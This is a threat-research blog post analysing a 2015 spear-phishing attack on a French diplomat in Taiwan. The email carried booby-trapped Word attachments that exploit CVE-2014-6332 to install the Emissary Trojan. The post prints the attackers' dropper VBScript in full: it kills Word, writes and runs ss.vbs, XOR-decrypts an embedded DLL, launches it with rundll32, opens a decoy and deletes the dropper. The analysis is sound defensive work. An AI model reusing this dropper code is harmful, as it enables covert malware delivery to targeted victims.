[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# Attack on French Diplomat Linked to Operation Lotus Blossom

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 12 min read

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Jen Miller-Osborn](https://unit42.paloaltonetworks.com/author/jen-miller-osborn/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:December 18, 2015

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [Email](https://unit42.paloaltonetworks.com/tag/email/)
  * [Emissary](https://unit42.paloaltonetworks.com/tag/emissary/)
  * [Lotus Blossom](https://unit42.paloaltonetworks.com/tag/lotus-blossom/)
  * [Spear Phishing](https://unit42.paloaltonetworks.com/tag/spear-phishing/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/?pdf=download&lg=en&_wpnonce=279fa6c5e6 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/attack-on-french-diplomat-linked-to-operation-lotus-blossom/?pdf=print&lg=en&_wpnonce=279fa6c5e6 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Attack%20on%20French%20Diplomat%20Linked%20to%20Operation%20Lotus%20Blossom&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F&title=Attack%20on%20French%20Diplomat%20Linked%20to%20Operation%20Lotus%20Blossom "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F&text=Attack%20on%20French%20Diplomat%20Linked%20to%20Operation%20Lotus%20Blossom "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Attack%20on%20French%20Diplomat%20Linked%20to%20Operation%20Lotus%20Blossom%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fattack-on-french-diplomat-linked-to-operation-lotus-blossom%2F "Share in Mastodon")
  We observed a targeted attack in November directed at an individual working for the French Ministry of Foreign Affairs. The attack involved a spear-phishing email sent to a single French diplomat based in Taipei, Taiwan and contained an invitation to a Science and Technology support group event.

The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept (POC) code to install a Trojan called Emissary, which is related to the [Operation Lotus Blossom](https://blog.paloaltonetworks.com/2015/06/operation-lotus-blossom/) campaign. The TTPs used in this attack also match those detailed in the paper. The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan.

We have created the [Emissary](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Emissary) tag for AutoFocus users to track this threat.

# En garde!

On November 10, 2015, threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs. The subject and the body of the email suggest the targeted individual had been invited to a Science and Technology conference in Hsinchu, Taiwan. The e-mail appears quite timely, as the conference was held on November 13, 2015, which is three days after the attack took place.

The email body contained a link to the legitimate registration page for the conference, but the email also had two attachments with the following filenames that also pertain to the conference:

1. 蔡英文柯建銘全國科技後援會邀請函.doc (translates to "Tsai Ker Chien-ming National Science and Technology Support Association invitations.doc")
2. 書面報名表格.doc (translates to "Written Application Form.doc")

Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by [CVE-2014-6332](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6332). Upon successful exploitation, the attachments will install a Trojan named Emissary and open a Word document as a decoy.

The first attachment opens a decoy (Figure 2) that is a copy of an invitation to a Science and Technology conference this past November 13th held in Hsingchu, Taiwan, while the second opens a decoy (Figure 1) that is a registration form to attend the conference. The conference was widely advertised online and on Facebook, however in this case the invitation includes a detailed itinerary that does not seem to have appeared online. The Democratic Progressive's Party (DPP) Chairwoman Tsai Ing-wen and DPP caucus whip and Hsinchu representative Ker Chien-ming were the primary political sponsors of the conference and are longtime political allies. Tsai Ing-wen is the current front-runner for the Taiwanese Presidency and Ker Chien-ming may become Speaker if she wins. The conference focused on using open source technology, open international recruiting, and partnerships to continue developing Hsinchu as the Silicon Valley of Taiwan. It particularly noted France as an ally in this, and France is Taiwan's second largest technology partner and fourth largest trading partner in Europe.

![fig1](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/fig1-500x277.png)

*Figure 1 Decoy document containing written application form*

![fig2](http://blog.paloaltonetworks.com/wp-content/uploads/2015/12/fig2-500x393.png)

*Figure 2 Decoy document containing the invitation and agenda for event*

# Exploiting CVE-2014-6332

The threat actors attempted to exploit CVE-2014-6332 using the [POC code](https://gist.github.com/worawit/77a839e3e5ca50916903) available in the wild. The POC code contains inline comments that explain how the malicious VBScript exploits this vulnerability, so instead of discussing the malicious script or exploit itself, we will focus on the portions of the script that the threat actors modified.

The actors removed the explanatory comments from the VBScript and made slight modifications to the POC code. The only major functional difference between the POC and the VBScript involved adding the ability to extract and run both a decoy document and payload. Figure 3 and 4 compare the differing "runshell" command within the POC and the malicious documents used in this attack. The code in Figure 3 shows that the POC does nothing more than launch the notepad.exe application upon successful exploitation. Figure 4 shows the malicious document creating a file named "ss.vbs" that it writes a VBScript to using a series of "echo" statements. After writing the VBScript, the malicious document executes the "ss.vbs" file.  
function runshell() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function

|-----------|------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 | function runshell() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function |

*Figure 3 Code block containing "runshell" function in CVE-2014-6332 proof-of-concept VBScript*

function runshell() On Error Resume Next set objshell= Createobject("WScript.Shell") strValue = objshell.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Local AppData") ename = "rundll32"","""""""\&strValue\&"\\mm.dll"""",Setting" outfile1= strValue\&"\\mm.dll" bs = strValue\&"\\ss.vbs" dn= strValue\&"\\t.doc" v=window.location.href v=Replace(v,"file:///","",1,1,1) v=Replace(v,"?.html","",1,1,1) v=Replace(v,"%20"," ",1) v=Replace(v,"/","\\",1) cmd = "cmd" arg=" /c taskkill -f -im winword.exe " arg1= """,""" set shell=createobject("wscript.shell") shell.run "cmd.exe /c ""echo On Error Resume Next \>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo set shell=createobject(""Shell.Application"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute ""cmd"","""\&arg\&""","""","""",0 \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo wscript.sleep 3000 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim L1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim Len \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim infile \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim outfile1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim outfile2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo infile = """\&v\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo outfile1 = """\&outfile1\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo outfile2 = """\&dn\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo L1= 78924 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo L2= 38912 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo size= 144893 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo offset1 = size-L1-L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo offset2 = size-L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Len=0 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo str = ReadBinary (infile,L1,offset1) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo WriteBinary outfile1, str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo str = ReadBinary (infile,L2,offset2) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo WriteBinary outfile2, str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Function ReadBinary(FileName,length,offset) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Dim Buf(), I \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo With CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Len =length -1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo ReDim Buf(Len) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo For I = 0 To Len: if(I=0) then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Next \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End With \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo ReadBinary = Buf \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End Function \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Sub WriteBinary(FileName, Buf) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Dim I, aBuf, Size, bStream \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Size = UBound(Buf): ReDim aBuf(Size \\ 2) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo For I = 0 To Size - 1 Step 2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo aBuf(I \\ 2) = ChrW(Buf(I + 1) \* 256 + Buf(I)) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Next \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I)) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo aBuf=Join(aBuf, """") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set bStream = CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo bStream.Type = 1: bStream.Open \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo With CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Type = 2 : .Open: .WriteText aBuf \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Position = 2: .CopyTo bStream: .Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End With \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo bStream.SaveToFile FileName, 2: bStream.Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set bStream = Nothing \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End Sub \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo set shell=createobject(""Shell.Application"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute """\&dn\&""" \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute """\&ename\&""" \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set xa = CreateObject(""Scripting.FileSystemObject"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo If xa.FileExists("""\&bs\&""") Then \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set xb = xa.GetFile("""\&bs\&""") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo xb.Delete \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End If \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c """\&bs\&""" ",0,true end function

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 | function runshell() On Error Resume Next set objshell= Createobject("WScript.Shell") strValue = objshell.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Local AppData") ename = "rundll32"","""""""\&strValue\&"\\mm.dll"""",Setting" outfile1= strValue\&"\\mm.dll" bs = strValue\&"\\ss.vbs" dn= strValue\&"\\t.doc" v=window.location.href v=Replace(v,"file:///","",1,1,1) v=Replace(v,"?.html","",1,1,1) v=Replace(v,"%20"," ",1) v=Replace(v,"/","\\",1) cmd = "cmd" arg=" /c taskkill -f -im winword.exe " arg1= """,""" set shell=createobject("wscript.shell") shell.run "cmd.exe /c ""echo On Error Resume Next \>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo set shell=createobject(""Shell.Application"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute ""cmd"","""\&arg\&""","""","""",0 \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo wscript.sleep 3000 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim L1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim Len \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim infile \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim outfile1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo dim outfile2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo infile = """\&v\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo outfile1 = """\&outfile1\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo outfile2 = """\&dn\&""" \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo L1= 78924 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo L2= 38912 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo size= 144893 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo offset1 = size-L1-L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo offset2 = size-L2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Len=0 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo str = ReadBinary (infile,L1,offset1) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo WriteBinary outfile1, str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo str = ReadBinary (infile,L2,offset2) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo WriteBinary outfile2, str \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Function ReadBinary(FileName,length,offset) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Dim Buf(), I \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo With CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Len =length -1 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo ReDim Buf(Len) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo For I = 0 To Len: if(I=0) then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Next \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End With \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo ReadBinary = Buf \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End Function \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Sub WriteBinary(FileName, Buf) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Dim I, aBuf, Size, bStream \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Size = UBound(Buf): ReDim aBuf(Size \\ 2) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo For I = 0 To Size - 1 Step 2 \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo aBuf(I \\ 2) = ChrW(Buf(I + 1) \* 256 + Buf(I)) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Next \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I)) \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo aBuf=Join(aBuf, """") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set bStream = CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo bStream.Type = 1: bStream.Open \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo With CreateObject(""ADODB.Stream"") \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Type = 2 : .Open: .WriteText aBuf \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo .Position = 2: .CopyTo bStream: .Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End With \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo bStream.SaveToFile FileName, 2: bStream.Close \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set bStream = Nothing \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End Sub \>\> """\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo set shell=createobject(""Shell.Application"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute """\&dn\&""" \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo shell.ShellExecute """\&ename\&""" \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set xa = CreateObject(""Scripting.FileSystemObject"") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo If xa.FileExists("""\&bs\&""") Then \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo Set xb = xa.GetFile("""\&bs\&""") \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo xb.Delete \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c ""echo End If \>\>"""\&bs\&""" "" ",0,true shell.run "cmd.exe /c """\&bs\&""" ",0,true end function |

*Figure 4 Code block containing "runshell" function in malicious VBScript within attachment*

The ss.vbs file is responsible for locating the payload and decoy document from the initial malicious document, as well as decrypting, saving and opening both of the files. The script has hardcoded offsets to the location of both the payload and decoy document within the initial document. The script will decrypt both of the embedded files using a two-byte XOR loop that skips the first byte and then decrypts the remaining using "A" and "C" as the key. After decrypting the embedded files, the script saves the decoy to "t.doc" and the payload to "mm.dll" in the "%APPDATA%\\LocalData" folder. Finally, the script will open the decoy document and launch the payload by calling its exported function named "Setting".  
On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "cmd"," /c taskkill -f -im winword.exe ","","",0 wscript.sleep 3000 dim str dim L1 dim L2 dim Len dim infile dim outfile1 dim outfile2 infile = "C:\\Documents and Settings\\\<username\>\\Desktop\\\<malicious document name\>.doc" outfile1 = "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\mm.dll" outfile2 = "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\t.doc" L1= 78924 L2= 38912 size= 144893 offset1 = size-L1-L2 offset2 = size-L2 Len=0 str = ReadBinary (infile,L1,offset1) WriteBinary outfile1, str str = ReadBinary (infile,L2,offset2) WriteBinary outfile2, str Function ReadBinary(FileName,length,offset) Dim Buf(), I With CreateObject("ADODB.Stream") .Mode = 3: .Type = 1: .Open: .LoadFromFile FileName : .Position = offset Len =length -1 ReDim Buf(Len) For I = 0 To Len: if(I=0) then Buf(I)=(AscB(.Read(1))) else if ((I mod 2)=0) then Buf(I)=(AscB(.Read(1)) xor AscB(chr(65))) else Buf(I)=(AscB(.Read(1)) xor AscB(chr(67))) end if Next .Close End With ReadBinary = Buf End Function Sub WriteBinary(FileName, Buf) Dim I, aBuf, Size, bStream Size = UBound(Buf): ReDim aBuf(Size \\ 2) For I = 0 To Size - 1 Step 2 aBuf(I \\ 2) = ChrW(Buf(I + 1) \* 256 + Buf(I)) Next If I = Size Then aBuf(I \\ 2) = ChrW(Buf(I)) aBuf=Join(aBuf, "") Set bStream = CreateObject("ADODB.Stream") bStream.Type = 1: bStream.Open With CreateObject("ADODB.Stream") .Type = 2 : .Open: .WriteText aBuf .Position = 2: .CopyTo bStream: .Close End With bStream.SaveToFile FileName, 2: bStream.Close Set bStream = Nothing End Sub set shell=createobject("Shell.Application") shell.ShellExecute "C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\t.doc" shell.ShellExecute "rundll32","""C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\mm.dll"",Setting" Set xa = CreateObject("Scripting.FileSystemObject") If xa.FileExists("C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\ss.vbs") Then Set xb = xa.GetFile("C:\\Documents and Settings\\\<username\>\\Local Settings\\Application Data\\ss.vbs") xb.Delete End If

|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
